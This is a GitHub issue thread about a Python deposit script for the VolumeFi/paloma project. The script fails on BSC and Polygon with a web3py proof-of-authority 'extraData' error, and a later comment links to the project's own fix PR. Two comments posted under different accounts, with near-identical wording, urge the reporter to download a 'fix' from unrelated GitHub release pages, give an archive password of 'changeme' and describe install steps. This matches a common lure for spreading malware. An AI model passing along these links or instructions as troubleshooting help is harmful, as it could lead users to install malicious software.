### ISSUE TITLE
[BUG] Python Script Deposit Failed with Error An error occurred: The field extraData is 280 bytes, but should be 32

### ISSUE THREAD

**Issue by taariq** [VolumeFi/paloma#2078]
**Error on BNB chain Deposit**
(.venv) taariqlewis@playadenbossa~/Projects/VolumeFi_Projects/w3tools/depositor: python deposit_funds.py paloma149hq4n6kfwayyc0epmxcn6u7xqk35wlqq3paqgaslzd9x7wur0ts69wmdc 0.01 bsc
Depositing funds...
Paloma Address:  paloma149hq4n6kfwayyc0epmxcn6u7xqk35wlqq3paqgaslzd9x7wur0ts69wmdc
Amount:  0.01
Chain name:  BSC
RPC URL:  https://bsc-dataseed1.binance.org/
Keystore Path:  /Users/taariqlewis/Projects/VolumeFi_Projects/w3tools/depositor/pool_testing.json
Compass Address:  0x042Ab4cd2897BA02a420146af8d95f161A4230F1
Paloma Bytes32:  a96e0acf564bba4261f90ecd89eb9e302d1a3be00443d023b0f89a5379dc1bd7
Password:
Whoops! An error occurred: The field extraData is 280 bytes, but should be 32. It is quite likely that you are connected to a POA chain. Refer to http://web3py.readthedocs.io/en/stable/middleware.html#proof-of-authority for more details. The full extraData is: HexBytes('0xd88301040a846765746888676f312e32322e32856c696e757800000048fa7b05f8b5831fffffb860860dc08753fd1b419e3c0b82791de722b9e016bb303775e6220ccc644ff11a09e6ab410b2b191341fde883368271476c0f04f1d2fb83306fcd2c0fbb9a1612d6522e119aaf582e022413285e56a6c535961de8d17b1069f9cb894e4576be3632f84c84027d4271a072eff2d7d592646fe0981941295de086be821223de45cd8a7d0af598dddb695384027d4272a019d16d50b9a9cda0bc38e2fb24f0d591479a67b8b934707caadf84f7b167c888800073bacbc485f4b976ffc259dd19d0ebc75f96cf69cef2d0d5a45bceee11c85118ad6db9454ce2faee9b0a94bcf63a9f74b15c845f30da01a389bbcf827e7e5a01')

**Error on MATIC Chain Deposit**
(.venv) taariqlewis@playadenbossa~/Projects/VolumeFi_Projects/w3tools/depositor: python deposit_funds.py paloma149hq4n6kfwayyc0epmxcn6u7xqk35wlqq3paqgaslzd9x7wur0ts69wmdc 5 matic
Depositing funds...
Paloma Address:  paloma149hq4n6kfwayyc0epmxcn6u7xqk35wlqq3paqgaslzd9x7wur0ts69wmdc
Amount:  5
Chain name:  POLYGON
RPC URL:  https://polygon-rpc.com/
Keystore Path:  /Users/taariqlewis/Projects/VolumeFi_Projects/w3tools/depositor/pool_testing.json
Compass Address:  0x26f5Da70095d69103ba8b2Ee264A20cD4B590EAb
Paloma Bytes32:  a96e0acf564bba4261f90ecd89eb9e302d1a3be00443d023b0f89a5379dc1bd7
Password:
Whoops! An error occurred: The field extraData is 100 bytes, but should be 32. It is quite likely that you are connected to a POA chain. Refer to http://web3py.readthedocs.io/en/stable/middleware.html#proof-of-authority for more details. The full extraData is: HexBytes('0xd78301030783626f7288676f312e32322e35856c696e75780000000000000000c280c013482fe259e4ac18060adc27ba8c0deb9f8b36bc9caf22dd41fe126f2eb8ab294bfee20e139549a6d1ca371dfafcde3894b7a00216cfd67f8d8fe5dea6c94f1200')

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by webelf101** [comment]
https://github.com/VolumeFi/w3tools/pull/3
This is solved with this PR.
@taariq
